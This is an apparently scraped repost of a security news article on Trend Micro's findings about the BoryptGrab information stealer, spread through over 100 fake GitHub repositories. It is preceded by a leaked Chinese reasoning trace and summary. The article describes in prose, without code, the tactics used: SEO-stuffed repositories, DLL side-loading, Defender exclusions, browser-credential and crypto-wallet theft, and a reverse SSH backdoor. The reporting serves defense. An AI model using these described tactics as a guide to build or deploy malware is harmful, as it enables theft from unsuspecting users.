好的,我现在需要帮用户总结这篇文章的内容,控制在100字以内。首先,我得通读全文,抓住主要信息。 文章讲的是Trend Micro发现了一个恶意软件传播活动,使用GitHub仓库传播BoryptGrab窃取器。这个窃取器会收集浏览器数据、加密钱包信息和用户文件。攻击者通过伪装成软件工具或游戏外挂的ZIP文件分发恶意软件,并利用SEO关键词提高搜索排名。此外,他们还使用了反分析技术来避免检测,且有迹象显示攻击者可能来自俄罗斯。 接下来,我需要将这些关键点浓缩到100字以内。确保包括:Trend Micro发现、GitHub传播、BoryptGrab功能、伪装ZIP文件、SEO策略、反分析技术、俄语线索等。 然后组织语言,确保流畅且信息完整。比如: “Trend Micro发现攻击者利用超过100个GitHub仓库传播BoryptGrab恶意软件。该软件伪装成常用工具或游戏外挂,通过ZIP文件分发,窃取浏览器数据、加密钱包信息和用户文件。攻击者使用SEO优化和反分析技术,并留有俄语线索。” 检查字数是否在限制内,并确保所有关键点都被涵盖。 </think> Trend Micro发现攻击者利用超过100个GitHub仓库传播BoryptGrab恶意软件。该软件伪装成常用工具或游戏外挂,通过ZIP文件分发,窃取浏览器数据、加密钱包信息和用户文件。攻击者使用SEO优化和反分析技术,并留有俄语线索。 2026-3-8 13:38:12 Author: securityaffairs.com(查看原文) 阅读量:9 收藏
Massive GitHub malware operation spreads BoryptGrab stealer
Trend Micro found BoryptGrab stealer spreading through 100+ GitHub repositories, stealing browser data, crypto wallets, system information, and user files.
Trend Micro uncovered a campaign distributing the BoryptGrab information stealer through more than 100 GitHub repositories.
BoryptGrab is designed to collect browser and cryptocurrency wallet data, system details, and common files. Some variants also deploy a PyInstaller backdoor called TunnesshClient, which creates a reverse SSH tunnel to communicate with attackers.
The malware is distributed via ZIP archives posing as software tools and game cheats, linked to over 100 GitHub repositories.
“By tracing the infection chain, we were able to observe several ZIP archive files in the wild (all with similar naming conventions) that masquerade as common software tools (including gaming cheat hacks).” reads the report published by Trend Micro. “As the “github-io” patterns in some ZIP file names suggest, searching for the software tool patterns leads to over a hundred public Github repositories delivering malware.”
Evidence such as Russian-language comments and infrastructure suggests the threat actors may have a Russian origin.
Attackers spread the malware through public GitHub repositories that pose as free software tools, game cheats, or utilities.
They stuff README files with SEO keywords so search engines rank the malicious repositories near legitimate results. One example mimics a Voicemod Pro download page and links to a GitHub-hosted site that looks like a normal project directory.
The page contains Russian comments and redirects visitors through a chain of encoded URLs until it reaches a fake download page that generates a ZIP archive containing the malware. Many repositories reuse the same logic and sometimes send tracking data to the attackers.
The downloaded ZIP files launch the infection through several methods. In one route, an executable side-loads a malicious libcurl.dll that decrypts a hidden launcher payload.
The launcher downloads the BoryptGrab information stealer and may also retrieve other payloads, including Vidar variants, a PyInstaller backdoor called TunnesshClient, and a Golang downloader named HeaconLoad. The launcher uses build names such as Shrek, Leon, or CryptoByte to request specific payloads and sets scheduled tasks to keep the malware running.
“Some launcher payload variants contain build names (with some differing from each other) . The launcher payload passes the build name as the “-b” argument when executing the BoryptGrab stealer it downloads.” continue the report.
Another infection path uses a VBS downloader that hides commands inside integer arrays. The script decodes PowerShell commands, downloads a launcher from a remote server, and can even add Microsoft Defender exclusions to avoid detection. That launcher then retrieves the BoryptGrab stealer and other tools from the attacker’s infrastructure.
In some variants, a .NET loader or embedded scripts trigger the same process, while others include the HeaconLoad downloader directly. HeaconLoad maintains persistence with registry entries and scheduled tasks, sends system information to a command-and-control server, and downloads additional bundles when available.
Several payloads rely on obfuscation techniques such as XOR-encrypted strings, dynamic API resolution, and code injection. Russian-language comments and log messages appear throughout the infrastructure and malware samples, suggesting the operators likely have a Russian background.
BoryptGrab is a C/C++ information stealer designed to collect large amounts of sensitive data from infected systems. The malware accepts optional command-line arguments such as –output-path to define where stolen data will be stored and –build-name to tag collected information. If attackers do not provide a build name, the malware uses a default value or relies on hardcoded identifiers such as CryptoByte, Shrek, Sonic, or Yaropolk, which help operators track infections.
Before collecting data, BoryptGrab performs anti-analysis checks.
“BoryptGrab detects whether it is executed in a virtual machine environment by querying registry entries and checking VM-related files. As part of its anti-analysis check, BoryptGrab also compares the names of running processes against a predefined list. It also attempts to execute with elevated privilege.” continues the report. “When the “–output-path”/”-o” argument is not given, BoryptGrab formats a default output path name using the current time, public IP address, and country code. Later, a directory with this output path name is created to stage collected data.”
It searches for signs of virtual machines, scans running processes against a predefined list, and attempts to gain elevated privileges. If no output path is specified, it creates a directory using the current time, public IP address, and country code to store stolen data.
The stealer targets data from many browsers, including Chrome, Edge, Firefox, Opera, Brave, Vivaldi, and Yandex. It uses techniques from public GitHub tools designed to bypass Chrome’s App-Bound Encryption and decrypt stored browser credentials. The malware loads an encrypted internal payload that extracts saved passwords and records installed applications.
BoryptGrab also downloads a helper tool to assist with Chromium-based browser extraction. Beyond browser data, it steals information from numerous desktop cryptocurrency wallets such as Exodus, Electrum, Ledger Live, Atomic, Binance, Wasabi, and Trezor. It captures screenshots, gathers system details, and includes a “file grabber” module that collects files with specific extensions from common directories. The malware also extracts Telegram files, browser passwords, and in newer variants, Discord tokens.
After gathering the data, BoryptGrab compresses and uploads the archive to the attacker’s server. Some variants also download TunnesshClient, a PyInstaller backdoor that establishes a reverse SSH tunnel, allowing attackers to run commands, move files, and use the infected system as a proxy.
“The BoryptGrab campaign illustrates an evolving threat ecosystem targeting users through deceptive software downloads and fake GitHub repositories.” concludes the report.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, malware)
如有侵权请联系:admin#unsafe.sh